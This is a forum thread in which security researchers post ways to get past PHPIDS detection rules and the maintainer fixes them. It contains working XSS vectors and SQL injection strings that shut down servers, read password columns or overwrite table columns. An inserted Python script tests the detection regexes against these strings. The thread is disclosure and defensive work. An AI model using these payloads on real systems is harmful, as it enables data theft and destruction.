Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Kyo
Date: July 30, 2008 06:00AM

question - what does the above do, and how does it work?

I assume it executes PHP code located at that link?



Edited 1 time(s). Last edit at 07/30/2008 06:00AM by Kyo.

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: lpilorz
Date: July 30, 2008 10:01AM

It tries to upload your php file to attacked server. I think this advisory explains it best:
http://www.hardened-php.net/advisory_042006.119.html

This vector is useful against preg_replace and sometimes eval (bugs like: <?php eval('$var="'.addslashes($_GET['var']).'";'); ?>).

Simply:
{${function()}} substitutes ".function()."
`` substitutes shell_exec()

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: lpilorz
Date: July 30, 2008 10:15AM

And what you meant would rather look like:
http://www.securityfocus.com/archive/1/448007/100/0/threaded

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: July 30, 2008 05:00PM

Whatever it does - it's a nice circumvention. And it's fixed. Please excuse my late response but my workspace IP is still banned due to whatever reason so I can only respond from home (although I pinged id multiple times).

Thank you CM and lpilorz - your comments and findings were great and are being reflected in the current trunk revision - I will mention you as usual in the next release notes!

@Kyo: Back ticks - love them.

Greetings,
.mario

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Kyo
Date: July 30, 2008 06:57PM

Oh right, so PHPIDS uses the /e flag at some point, then. Yeah, that makes it make sense again (though I did not know you could use ´ in php)

Well that calms me, for a moment there I thought that I might be vulnerable. You never know, if you look at some of the shit PHP has done, security wise, in the past (particularly register globals...)

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: C1c4Tr1Z
Date: August 02, 2008 01:11AM

I don't know if this is the right place to post it, but I've found a vector that PHPIDS didn't recognize:

a>>/al/+/ert/|a(0)

Thanks!

EDIT: This vector doesn't seem to work! My browser is crazy :).



Edited 1 time(s). Last edit at 08/02/2008 01:42AM by C1c4Tr1Z.

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: thrill
Date: August 02, 2008 01:17AM

This is the right forum to post it.. good job boludo! :)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Gareth Heyes
Date: August 02, 2008 05:42AM

@C1c4Tr1Z

Doesn't seem to be a valid vector dude

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: thrill
Date: August 02, 2008 10:23AM

@Gareth - He actually IM'd me and said that it worked the first 15 times, but then it stopped working and doesn't know why. He says his English is not that good, but I don't believe him either.. ;)

--thrill


Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Kyo
Date: August 03, 2008 05:18AM

The only thing like that I got to work is
top[/alert/.source](0)|a
but that doesn't pass the filter

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: August 03, 2008 10:01AM

@all: I think a was accidentally assigned with alert or something else before - like:

a=alert
a>>/al/+/ert/|a(0)

Which of course results in an impact of 8 ;)

Greetings,
.mario

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: C1c4Tr1Z
Date: August 03, 2008 01:06PM

@.mario: Yeah, I think that was the problem, because I was testing this vector from p42.us:

a=alert,a(0)

I was playing with something like this, but its impact is 35. :D

a=/aalertt/;/a(.*)t/.test(a),a=eval(RegExp.$1);a(0)

bye!

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Gareth Heyes
Date: August 03, 2008 04:31PM

Here's one technique which produces an impact of 4, it could be turned into a vector quite easily:-
1[<t>__par{new Array}ent__</t>][<t>al{new Array}ert</t>](1)

I love E4X :)

See if anyone can do it before mario reads it and fixes it


Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: August 03, 2008 05:12PM

read and fixed ;)

very nice technique btw!

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: thornmaker
Date: August 04, 2008 09:55AM

C1c4Tr1Z Wrote:
> @.mario: Yeah, I think that was the problem, because I was testing this vector from p42.us:

how exactly were you testing this from p42.us?

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: C1c4Tr1Z
Date: August 04, 2008 12:26PM

@thornmaker: Because I saw that on p42.us, and I wanted to change it based on that vector, trying to bypass PHPIDS. (but I couldn't)

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: thornmaker
Date: August 04, 2008 08:34PM

@C1c4Tr1Z ah, I see. Just wanted to make sure I hadn't been hacked or anything like that :)

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Reiners
Date: August 07, 2008 12:36PM

MSSQL:
asd'; shutdown;

PostgreSQL:

The "null" seems to irritate the filter rules. This works perfectly on PostgreSQL, because PostgreSQL returns the output of the last stacked query.

asd'; select null,password,null from users;

PostgreSQL also supports union distinct select, which in combination with a "(" is not in the filter rules.

asd' union distinct(select null,password,null from users)--a

I think there are a lot more vectors possible with PostgreSQL, it's pretty flexible. For MSSQL there are some Transact-SQL injections possible, like

aa aa'; DECLARE tablecursor CURSOR FOR select a.name as c,b.name as d,(null)from sysobjects a,syscolumns b where a.id=b.id and a.xtype = ( 'u' ) and current_user = current_user OPEN tablecursor

but since I found no way of declaring variables (declare @var varchar(32)) I can't build any cool vectors ;)

maybe someone else has some ideas, latest version with impact = 0:
aa aa'; DECLARE tablecursor CURSOR FOR select a.name as c,b.name as d,(null)from sysobjects a,syscolumns b 
where a.id=b.id and a.xtype = ( 'u' ) and current_user = current_user 
OPEN tablecursor FETCH NEXT FROM tablecursor INTO @a,@b WHILE(@a != null) 
@query  = null+null+null+null+ ' UPDATE '+null+@a+null+ ' SET id=null,@b = @payload'
BEGIN EXEC sp_executesql @query
FETCH NEXT FROM tablecursor INTO @a,@b END
CLOSE tablecursor DEALLOCATE tablecursor;
and some text, to get past the centrifuge; and some more text.
What's missing is the correct concat of the @query with @b
@query  = null+null+null+ ' UPDATE '+null+@a+ ' SET[  '+null+@b+ ' ]  = @payload'
but then I can't get around the centrifuge anymore ;) and of course the declaration of the vars.



Edited 2 time(s). Last edit at 08/07/2008 12:48PM by Reiners.

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: thornmaker
Date: August 07, 2008 02:08PM

@reiners: impressive :)

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: August 07, 2008 03:02PM

Phew - impressive indeed! All fixed for now but I am sure there's more...

Thx!
.mario

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Reiners
Date: August 07, 2008 06:31PM

Some notes for the fixes:

> asd' union distinct ( select null,password,(null)from user )-- a

still works, because distinct is missing in the filter:

> (?:union\s*(?:all)?\s*[([]\s*select)

and the (null) evades the filter

> (?:select\s[\s\w\.,-]+\sfrom)

Note that you can also do something like:

> asd asd asd'; END; select(pass)from users

on MSSQL and PostgreSQL.

The CURSOR I declared in my previous post was maybe a bit misleading. the syntax is:
DECLARE yourcursorname CURSOR FOR yoursqlstatement

Too bad you are going to fix this; there is a lot of potential in those stored procedure type of injections.

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: August 08, 2008 08:43AM

Thanks - fixed ;)

Do you know which characters are allowed for the cursor names? Just \w or . and - too?

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Reiners
Date: August 08, 2008 04:37PM

Just \w is allowed for cursor names.

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Gareth Heyes
Date: August 26, 2008 02:58PM

IE only window.name vector:-

<iframe name="expression(alert(1))" src="http://demo.phpids.org/?test=%28new%20Option%29.style.setExpression%281%2C1%26%26name%29"></iframe>


Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: August 26, 2008 04:23PM

Huh?

<edit>
Ah ;)
</edit>



Edited 1 time(s). Last edit at 08/26/2008 04:24PM by .mario.

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Gareth Heyes
Date: August 26, 2008 04:29PM

Yeah sorry I couldn't be bothered uploading a file :)

uses window.name to execute


Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: August 26, 2008 04:35PM

Very nice indeed! I didn't know yet that you could set expressions like that - shame on me ;) Fixed...

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Reiners
Date: August 28, 2008 02:49PM

MSSQL allows [brackets] around column and table.

asd'; select [column] from users

edit:
OK, the above injection wouldn't work because of unclosed quotes. This one would do it:
asd'; select [column] from table where 1 like '1


edit²:
Note that if you use brackets, whitespace is not necessary anymore:
asaa';SELECT[asd]FROM[asd]



Edited 2 time(s). Last edit at 08/31/2008 10:02AM by Reiners.

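Reiners' posts above (the `(null)`, `union distinct` and `END; select(pass)from` vectors, and the later `[bracket]` vectors) all work by keeping a SELECT outside the shape the two quoted rules expect. The script below is an added example, not code from this thread or from PHPIDS: it runs the two rules quoted above against the posted vectors, then against a tightened pair of patterns written only for this example (not the project's actual fix), so the reader can see exactly which input each pattern catches. It assumes case-insensitive matching, which is how the PHPIDS rule set was applied; the sample vectors are copied from the posts.

```python
import re

# The two PHPIDS rules quoted in the thread. They are shown there without
# modifiers; case-insensitive matching is assumed below.
ORIGINAL_RULES = {
    "union_select": r"(?:union\s*(?:all)?\s*[([]\s*select)",
    "select_from": r"(?:select\s[\s\w\.,-]+\sfrom)",
}

# Tightened variants written for this example (not PHPIDS's real fix):
#  - accept DISTINCT as well as ALL after UNION, and make the bracket optional;
#  - let the column list start and end with '(' / '[' / ')' / ']' instead of
#    requiring whitespace, and allow those characters inside the list.
HARDENED_RULES = {
    "union_select": r"(?:union\s*(?:all|distinct)?\s*[(\[]?\s*select)",
    "select_from": r"(?:select(?:\s|[(\[])[\s\w.,()\[\]-]+(?:\s|[)\]])from)",
}

# Constructed sample inputs: the injection strings posted in the thread.
VECTORS = [
    "asd'; select null,password,null from users;",
    "asd' union distinct ( select null,password,(null)from user )-- a",
    "asd asd asd'; END; select(pass)from users",
    "asd'; select [column] from table where 1 like '1",
    "asaa';SELECT[asd]FROM[asd]",
]


def matching_rules(rules, payload):
    """Sorted names of the rules in `rules` that fire on `payload`."""
    return sorted(name for name, pattern in rules.items()
                  if re.search(pattern, payload, re.IGNORECASE))


def evasion_report(vectors=VECTORS):
    """Map each vector to (rules hit originally, rules hit after hardening).

    An empty first list means the vector slipped past both quoted rules,
    which is what the thread's "impact = 0" results describe.
    """
    return {v: (matching_rules(ORIGINAL_RULES, v),
                matching_rules(HARDENED_RULES, v)) for v in vectors}


if __name__ == "__main__":
    for vector, (before, after) in evasion_report().items():
        status = "caught" if before else "EVADES"
        print(f"{status:6} original={before or '-'} hardened={after or '-'}  {vector}")
```

Only the plain `select null,password,null from users` form trips the quoted rules; every variant with a bracket touching `select` or `from`, or with `distinct` in place of `all`, produces no hit at all. The hardened patterns are deliberately narrow; in a real rule set a single regex is only one layer and the overall impact score is what decides the verdict.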
Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Gareth Heyes
Date: August 29, 2008 03:25PM

Another IE only vector

<iframe src=http://demo.phpids.org/?test=document.URL%3D1%26%26name name="javascript:alert(/Mmmmmm URL vector/)">

Uses window.name so the actual vector is:-
document.URL=1&&name

http://www.businessinfo.co.uk/labs/phpids/urlvector.php




Edited 1 time(s). Last edit at 09/01/2008 03:36AM by Gareth Heyes.

Re: PHPIDS (0.5.2 - so fast you won't see it)
Posted by: Anonymous User
Date: September 01, 2008 10:04AM

@Reiners: Nice find but damn - that's not easy to handle. I will think about a good way this weekend. Thanks!

@Gareth: whoops - somehow URL disappeared from one rule. Fixed - 10x!!

<edit>
@Reiners: What characters are allowed for MSSQL col names? \w and - or more?
</edit>



Edited 1 time(s). Last edit at 09/01/2008 10:28AM by .mario.
